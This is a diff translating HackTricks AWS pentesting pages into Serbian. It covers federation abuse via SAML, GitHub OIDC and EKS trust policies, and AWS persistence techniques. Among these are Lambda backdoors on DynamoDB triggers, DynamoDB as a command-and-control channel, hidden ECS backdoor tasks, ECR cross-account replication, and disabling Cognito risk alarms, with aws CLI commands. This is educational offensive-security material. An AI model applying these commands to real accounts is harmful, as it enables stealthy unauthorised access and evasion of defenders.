If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
## References
## Reference
- [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
- [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)
- [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html)
{{#include ../../../banners/hacktricks-training.md}}

158
src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
View File

@@ -1,87 +1,84 @@
# AWS - Federation Abuse
# AWS - Zloupotreba federacije
{{#include ../../../banners/hacktricks-training.md}}
## SAML
For info about SAML please check:
Za informacije o SAML-u, molimo proverite:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/saml-attacks
{{#endref}}
In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key)
Da biste konfigurisali **Identitetsku federaciju putem SAML-a**, potrebno je da obezbedite **ime** i **metadata XML** koji sadrži svu SAML konfiguraciju (**endpoints**, **sertifikat** sa javnim ključem)
## OIDC - Github Actions Abuse
## OIDC - Zloupotreba Github akcija
In order to add a github action as Identity provider:
1. For _Provider type_, select **OpenID Connect**.
2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
3. Click on _Get thumbprint_ to get the thumbprint of the provider
4. For _Audience_, enter `sts.amazonaws.com`
5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like:
- ```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:sub": [
"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
],
"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
}
}
}
]
}
```
6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**.
7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
8. Finally use a github action to configure the AWS creds to be used by the workflow:
Da biste dodali github akciju kao provajdera identiteta:
1. Za _Tip provajdera_, izaberite **OpenID Connect**.
2. Za _URL provajdera_, unesite `https://token.actions.githubusercontent.com`
3. Kliknite na _Preuzmi otisak_ da biste dobili otisak provajdera
4. Za _Publiku_, unesite `sts.amazonaws.com`
5. Kreirajte **novu ulogu** sa **dozvolama** koje github akcija zahteva i **politiku poverenja** koja veruje provajderu kao:
- ```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:sub": [
"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
],
"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
}
}
}
]
}
```
6. Obratite pažnju u prethodnoj politici kako je samo jedna **grana** iz **repozitorijuma** **organizacije** autorizovana sa specifičnim **okidačem**.
7. **ARN** uloge koju github akcija može da **imitira** biće "tajna" koju github akcija treba da zna, pa je **čuvajte** unutar **tajne** unutar **okruženja**.
8. Na kraju, koristite github akciju da konfigurišete AWS kredencijale koji će se koristiti u radnom toku:
```yaml
name: "test AWS Access"
# The workflow should only trigger on pull requests to the main branch
on:
pull_request:
branches:
- main
pull_request:
branches:
- main
# Required to get the ID Token that will be used for OIDC
permissions:
id-token: write
contents: read # needed for private repos to checkout
id-token: write
contents: read # needed for private repos to checkout
jobs:
aws:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
aws:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
- name: Configure AWS Credentials
uses: aws-actions/configure-aws-credentials@v1
with:
aws-region: eu-west-1
role-to-assume:${{ secrets.READ_ROLE }}
role-session-name: OIDCSession
- name: Configure AWS Credentials
uses: aws-actions/configure-aws-credentials@v1
with:
aws-region: eu-west-1
role-to-assume:${{ secrets.READ_ROLE }}
role-session-name: OIDCSession
- run: aws sts get-caller-identity
shell: bash
- run: aws sts get-caller-identity
shell: bash
```
## OIDC - EKS Abuse
## OIDC - EKS Zloupotreba
```bash
# Crate an EKS cluster (~10min)
eksctl create cluster --name demo --fargate
@@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate
# Create an Identity Provider for an EKS cluster
eksctl utils associate-iam-oidc-provider --cluster Testing --approve
```
It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
Moguće je generisati **OIDC provajdere** u **EKS** klasteru jednostavno postavljanjem **OIDC URL-a** klastera kao **novog Open ID provajdera identiteta**. Ovo je uobičajena podrazumevana politika:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
}
}
}
]
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
}
}
}
]
}
```
Ova politika ispravno ukazuje da **samo** **EKS klaster** sa **id** `20C159CDF6F2349B68846BEC03BE031B` može preuzeti ulogu. Međutim, ne ukazuje koja usluga može preuzeti, što znači da **BILO koja usluga sa web identitet tokenom** će moći da **preuzme** ulogu.
This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role.
In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as:
Da bi se odredilo **koja usluga bi trebala da može da preuzme ulogu,** potrebno je odrediti **uslov** gde je **ime usluge navedeno**, kao što je:
```bash
"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
```
## References
- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
{{#include ../../../banners/hacktricks-training.md}}

26
src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
View File

@@ -1,21 +1,17 @@
# AWS - Permissions for a Pentest
# AWS - Dozvole za Pentest
{{#include ../../banners/hacktricks-training.md}}
These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
Ovo su dozvole koje su vam potrebne na svakom AWS nalogu koji želite da auditujete kako biste mogli da pokrenete sve predložene AWS alate za audit:
- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
- **access-analyzer:List\***
- **access-analyzer:Get\***
- **iam:CreateServiceLinkedRole**
- **access-analyzer:CreateAnalyzer**
- Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission)
- **access-analyzer:DeleteAnalyzer**
- Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission)
- Podrazumevana politika **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
- Da biste pokrenuli [aws_iam_review](https://github.com/carlospolop/aws_iam_review) takođe su vam potrebne dozvole:
- **access-analyzer:List\***
- **access-analyzer:Get\***
- **iam:CreateServiceLinkedRole**
- **access-analyzer:CreateAnalyzer**
- Opcionalno ako klijent genere analize za vas, ali obično je lakše samo zatražiti ovu dozvolu)
- **access-analyzer:DeleteAnalyzer**
- Opcionalno ako klijent uklanja analize za vas, ali obično je lakše samo zatražiti ovu dozvolu)
{{#include ../../banners/hacktricks-training.md}}

7
src/pentesting-cloud/aws-security/aws-persistence/README.md
View File

@@ -1,6 +1 @@
# AWS - Persistence
# AWS - Persistencija

20
src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
View File

@@ -4,7 +4,7 @@
## API Gateway
For more information go to:
Za više informacija idite na:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
@@ -12,25 +12,21 @@ For more information go to:
### Resource Policy
Modify the resource policy of the API gateway(s) to grant yourself access to them
Izmenite politiku resursa API gateway-a kako biste sebi omogućili pristup.
### Modify Lambda Authorizers
Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
Or just remove the use of the authorizer.
Izmenite kod lambda autorizatora kako biste sebi omogućili pristup svim krajnjim tačkama.\
Ili jednostavno uklonite korišćenje autorizatora.
### IAM Permissions
If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
Or just remove the use of the authorizer.
Ako resurs koristi IAM autorizator, možete sebi omogućiti pristup izmenom IAM dozvola.\
Ili jednostavno uklonite korišćenje autorizatora.
### API Keys
If API keys are used, you could leak them to maintain persistence or even create new ones.\
Or just remove the use of API keys.
Ako se koriste API ključevi, možete ih procuriti kako biste održali postojanost ili čak kreirati nove.\
Ili jednostavno uklonite korišćenje API ključeva.
{{#include ../../../banners/hacktricks-training.md}}

28
src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
View File

@@ -4,7 +4,7 @@
## Cognito
For more information, access:
Za više informacija, pristupite:
{{#ref}}
../aws-services/aws-cognito-enum/
@@ -12,16 +12,16 @@ For more information, access:
### User persistence
Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
Cognito je servis koji omogućava dodeljivanje uloga neautentifikovanim i autentifikovanim korisnicima i kontrolu direktorijuma korisnika. Nekoliko različitih konfiguracija može biti izmenjeno kako bi se održala neka postojanost, kao što su:
- **Adding a User Pool** controlled by the user to an Identity Pool
- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- Or to an **authenticated Identity Pool** if the attacker can login
- Or **improve the permissions** of the given roles
- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
- **Dodavanje User Pool-a** koji kontroliše korisnik u Identity Pool
- Dodeljivanje **IAM uloge neautentifikovanom Identity Pool-u i omogućavanje Basic auth flow**
- Ili **autentifikovanom Identity Pool-u** ako napadač može da se prijavi
- Ili **poboljšanje dozvola** datih uloga
- **Kreiranje, verifikacija & privesc** putem atributima kontrolisanih korisnika ili novih korisnika u **User Pool-u**
- **Omogućavanje eksternim Identity Provider-ima** da se prijave u User Pool ili u Identity Pool
Check how to do these actions in
Proverite kako da izvršite ove akcije u
{{#ref}}
../aws-privilege-escalation/aws-cognito-privesc.md
@@ -29,18 +29,12 @@ Check how to do these actions in
### `cognito-idp:SetRiskConfiguration`
An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
Napadač sa ovom privilegijom mogao bi da izmeni konfiguraciju rizika kako bi mogao da se prijavi kao Cognito korisnik **bez aktiviranja alarma**. [**Proverite cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) da biste proverili sve opcije:
```bash
aws cognito-idp set-risk-configuration --user-pool-id <pool-id> --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
```
By default this is disabled:
Podrazumevano je ovo onemogućeno:
<figure><img src="https://lh6.googleusercontent.com/EOiM0EVuEgZDfW3rOJHLQjd09-KmvraCMssjZYpY9sVha6NcxwUjStrLbZxAT3D3j9y08kd5oobvW8a2fLUVROyhkHaB1OPhd7X6gJW3AEQtlZM62q41uYJjTY1EJ0iQg6Orr1O7yZ798EpIJ87og4Tbzw=s2048" alt=""><figcaption></figcaption></figure>
{{#include ../../../banners/hacktricks-training.md}}

62
src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
View File

@@ -1,67 +1,59 @@
# AWS - DynamoDB Persistence
# AWS - DynamoDB Persistencija
{{#include ../../../banners/hacktricks-training.md}}
### DynamoDB
For more information access:
Za više informacija pristupite:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
{{#endref}}
### DynamoDB Triggers with Lambda Backdoor
Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
### DynamoDB Okidači sa Lambda Backdoor-om
Korišćenjem DynamoDB okidača, napadač može kreirati **neprimetan backdoor** povezivanjem maliciozne Lambda funkcije sa tabelom. Lambda funkcija može biti okinuta kada se stavka doda, izmeni ili obriše, omogućavajući napadaču da izvrši proizvoljan kod unutar AWS naloga.
```bash
# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>
# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>
--table-name TargetTable \
--region <region>
# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>
```
Da bi održao postojanost, napadač može da kreira ili menja stavke u DynamoDB tabeli, što će pokrenuti zlonamernu Lambda funkciju. Ovo omogućava napadaču da izvrši kod unutar AWS naloga bez direktne interakcije sa Lambda funkcijom.
To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
### DynamoDB as a C2 Channel
An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
### DynamoDB kao C2 kanal
Napadač može koristiti DynamoDB tabelu kao **command and control (C2) kanal** kreiranjem stavki koje sadrže komande i korišćenjem kompromitovanih instanci ili Lambda funkcija za preuzimanje i izvršavanje ovih komandi.
```bash
# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>
# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>
```
The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
Kompromitovane instance ili Lambda funkcije mogu povremeno proveravati C2 tabelu za nove komande, izvršavati ih i po želji izveštavati o rezultatima nazad u tabelu. Ovo omogućava napadaču da održi postojanost i kontrolu nad kompromitovanim resursima.
{{#include ../../../banners/hacktricks-training.md}}

48
src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
View File

@@ -4,55 +4,51 @@
## EC2
For more information check:
Za više informacija proverite:
{{#ref}}
../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
{{#endref}}
### Security Group Connection Tracking Persistence
### Praćenje veze sigurnosne grupe
If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
Ako odbrambeni sistem otkrije da je **EC2 instanca kompromitovana**, verovatno će pokušati da **izoluje** **mrežu** mašine. To može učiniti sa eksplicitnim **Deny NACL** (ali NACL-ovi utiču na celu podmrežu), ili **promenom sigurnosne grupe** koja ne dozvoljava **nikakav ulazni ili izlazni** saobraćaj.
If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
Ako je napadač imao **obrnuti shell koji potiče sa mašine**, čak i ako je SG izmenjen da ne dozvoljava ulazni ili izlazni saobraćaj, **veza neće biti prekinuta zbog** [**Praćenja veze sigurnosne grupe**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
### EC2 Lifecycle Manager
### EC2 Menadžer životnog ciklusa
This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
Ova usluga omogućava **zakazivanje** **kreiranja AMI-a i snimaka** i čak **deljenje sa drugim nalozima**.\
Napadač bi mogao da konfigure **generisanje AMI-a ili snimaka** svih slika ili svih volumena **svake nedelje** i **podeli ih sa svojim nalogom**.
### Scheduled Instances
### Zakazane instance
It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
Moguće je zakazati instance da se pokreću dnevno, nedeljno ili čak mesečno. Napadač bi mogao da pokrene mašinu sa visokim privilegijama ili zanimljivim pristupom gde bi mogao da pristupi.
### Spot Fleet Request
### Spot Fleet Zahtev
Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
Spot instance su **jeftinije** od redovnih instanci. Napadač bi mogao da pokrene **mali spot fleet zahtev za 5 godina** (na primer), sa **automatskom IP** dodelom i **korisničkim podacima** koji šalju napadaču **kada spot instanca počne** i **IP adresu** i sa **IAM ulogom sa visokim privilegijama**.
### Backdoor Instances
### Instanca sa zadnjim ulazom
An attacker could get access to the instances and backdoor them:
Napadač bi mogao da dobije pristup instancama i da ih zadnji ulaz:
- Using a traditional **rootkit** for example
- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
- Backdooring the **User Data**
- Koristeći tradicionalni **rootkit** na primer
- Dodajući novu **javnu SSH ključ** (proverite [EC2 privesc opcije](../aws-privilege-escalation/aws-ec2-privesc.md))
- Zadnjim ulazom u **Korisničke podatke**
### **Backdoor Launch Configuration**
### **Konfiguracija pokretanja sa zadnjim ulazom**
- Backdoor the used AMI
- Backdoor the User Data
- Backdoor the Key Pair
- Zadnji ulaz u korišćeni AMI
- Zadnji ulaz u Korisničke podatke
- Zadnji ulaz u Par ključeva
### VPN
Create a VPN so the attacker will be able to connect directly through i to the VPC.
Kreirajte VPN tako da napadač može direktno da se poveže kroz njega sa VPC-om.
### VPC Peering
Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
Kreirajte peering vezu između VPC-a žrtve i VPC-a napadača kako bi mogao da pristupi VPC-u žrtve.
{{#include ../../../banners/hacktricks-training.md}}

104
src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
View File

@@ -4,98 +4,88 @@
## ECR
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-ecr-enum.md
{{#endref}}
### Hidden Docker Image with Malicious Code
### Sakrivena Docker slika sa zloćudnim kodom
An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
Napadač bi mogao **da otpremi Docker sliku koja sadrži zloćudni kod** u ECR repozitorijum i koristi je za održavanje postojanosti u ciljanom AWS nalogu. Napadač bi zatim mogao da implementira zloćudnu sliku na razne usluge unutar naloga, kao što su Amazon ECS ili EKS, na diskretan način.
### Repository Policy
Add a policy to a single repository granting yourself (or everybody) access to a repository:
### Politika repozitorijuma
Dodajte politiku jednom repozitorijumu koja vam omogućava (ili svima) pristup repozitorijumu:
```bash
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
# With a .json such as
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
```
> [!WARNING]
> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
> Imajte na umu da ECR zahteva da korisnici imaju **dozvolu** da pozivaju **`ecr:GetAuthorizationToken`** API putem IAM politike **pre nego što se mogu autentifikovati** na registru i slati ili preuzimati slike iz bilo kog Amazon ECR repozitorijuma.
### Registry Policy & Cross-account Replication
### Politika registracije i replikacija između naloga
It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
Moguće je automatski replicirati registar u eksternom nalogu konfigurišući replikaciju između naloga, gde treba da **naznačite eksterni nalog** u kojem želite da replicirate registar.
<figure><img src="../../../images/image (79).png" alt=""><figcaption></figcaption></figure>
First, you need to give the external account access over the registry with a **registry policy** like:
Prvo, treba da date eksternom nalogu pristup nad registrijem sa **politikom registracije** kao:
```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
```
Then apply the replication config:
Zatim primenite konfiguraciju replikacije:
```bash
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2
--replication-configuration file://replication-settings.json \
--region us-west-2
# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}
```
{{#include ../../../banners/hacktricks-training.md}}

96
src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
View File

@@ -4,29 +4,28 @@
## ECS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-ecs-enum.md
{{#endref}}
### Hidden Periodic ECS Task
### Sakrivena Periodična ECS Zadatak
> [!NOTE]
> TODO: Test
An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
Napadač može kreirati sakriveni periodični ECS zadatak koristeći Amazon EventBridge da **zakazuje izvršenje zlonamernog zadatka periodično**. Ovaj zadatak može vršiti izviđanje, eksfiltrirati podatke ili održavati postojanost u AWS nalogu.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an Amazon EventBridge rule to trigger the task periodically
@@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate
# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'
```
### Backdoor Container in Existing ECS Task Definition
> [!NOTE]
> TODO: Test
An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
Napadač može dodati **neprimetan backdoor kontejner** u postojeću ECS definiciju zadatka koji se pokreće zajedno sa legitimnim kontejnerima. Backdoor kontejner se može koristiti za postojanost i izvođenje zlonamernih aktivnosti.
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'
```
### Undocumented ECS Service
### Nedokumentovana ECS Usluga
> [!NOTE]
> TODO: Test
An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
Napadač može kreirati **nedokumentovanu ECS uslugu** koja pokreće zloćudni zadatak. Postavljanjem željenog broja zadataka na minimum i onemogućavanjem logovanja, postaje teže administratorima da primete zloćudnu uslugu.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
{{#include ../../../banners/hacktricks-training.md}}

14
src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
View File

@@ -4,22 +4,18 @@
## EFS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-efs-enum.md
{{#endref}}
### Modify Resource Policy / Security Groups
### Izmenite Politiku Resursa / Sigurnosne Grupe
Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
Izmenom **politike resursa i/ili sigurnosnih grupa** možete pokušati da zadržite svoj pristup u fajl sistemu.
### Create Access Point
### Kreirajte Pristupnu Tačku
You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
Možete **kreirati pristupnu tačku** (sa root pristupom do `/`) koja je dostupna iz servisa gde ste implementirali **drugog persistenciju** da zadržite privilegovan pristup fajl sistemu.
{{#include ../../../banners/hacktricks-training.md}}

78
src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
View File

@@ -4,31 +4,30 @@
## Elastic Beanstalk
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-elastic-beanstalk-enum.md
{{#endref}}
### Persistence in Instance
### Održavanje u Instanci
In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
Da bi se održala postojanost unutar AWS naloga, neki **mehanizam postojanosti može biti uveden unutar instance** (cron job, ssh ključ...) tako da napadač može da pristupi i ukrade IAM ulogu **akreditiva iz metadata servisa**.
### Backdoor in Version
### Bekdor u Verziji
An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
Napadač bi mogao da ubaci bekdor u kod unutar S3 repozitorijuma tako da se uvek izvršava njegov bekdor i očekivani kod.
### New backdoored version
### Nova verzija sa bekdorom
